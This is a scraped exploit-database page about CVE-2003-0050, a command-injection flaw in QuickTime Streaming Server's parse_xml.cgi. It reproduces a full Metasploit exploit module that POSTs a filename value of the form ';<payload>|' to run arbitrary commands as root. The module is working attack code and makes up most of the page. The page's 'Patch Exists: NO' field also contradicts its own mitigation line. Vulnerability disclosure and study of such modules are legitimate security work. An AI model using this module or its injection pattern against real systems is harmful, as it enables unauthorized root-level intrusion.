Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
QuickTime Streaming Server parse_xml.cgi Remote Execution - exploit.company
header-logo
Suggest Exploit
vendor:
QuickTime Streaming Server
by:
hdm
7.5
CVSS
HIGH
metacharacter injection
CWE
Product Name: QuickTime Streaming Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2003-0050
CPE: a:apple:quicktime_streaming_server
Metasploit:
Other Scripts:
Platforms Tested: Unix
2003

QuickTime Streaming Server parse_xml.cgi Remote Execution

The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.

Mitigation:

Update to a patched version of QuickTime Streaming Server.
Source

Exploit-DB raw data:

##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2003'
		))

		register_options(
			[
				Opt::RPORT(1220)
			], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# If the upload worked, the server tries to redirect us to some info
		# about the file we just saved
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end

Navigation

Suggest Exploit

Services By CQR